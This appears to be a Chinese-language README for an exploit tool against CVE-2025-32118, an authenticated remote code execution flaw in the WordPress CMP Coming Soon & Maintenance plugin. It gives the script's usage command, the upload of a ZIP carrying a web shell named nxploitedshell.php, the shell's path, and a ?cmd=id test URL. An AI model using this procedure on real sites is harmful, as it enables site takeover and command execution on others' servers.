🔍 标题: WordPress CMP – Coming Soon & Maintenance 插件 <= 4.1.13 - 远程代码执行 (RCE)
🗓️ 发布时间: 2025-04-04
🔐 CWE: CWE-434 - 危险类型文件的无限制上传
📊 CVSS: 9.1 (严重) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
WordPress 的 CMP – Coming Soon & Maintenance 插件(<= 4.1.13)中存在一个严重的远程代码执行 (RCE) 漏洞。
该漏洞允许已认证的管理员用户上传包含可执行 PHP 脚本的恶意 ZIP 文件,从而导致网站完全沦陷。
<= 4.1.13)的 WordPress 站点python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help 显示此帮助信息并退出
-u, --url URL WordPress 站点的基 URL
-un, --username USERNAME 管理员用户名
-p, --password PASSWORD 管理员密码
| 参数 | 描述 |
|---|---|
-u | WordPress 站点的基 URL |
-un | 用户名 |
-p | 密码 |
nonce。style.css(有效的主题格式)nxploitedshell.php(RCE 载荷)?cmd=whoami 验证 Shell。上传成功后,Shell 将位于:
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
通过以下命令测试:
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
此漏洞利用代码仅供教育目的使用。
未经授权将本代码用于你不拥有的系统是非法且不道德的。
Nxploited | Khaled Alenazi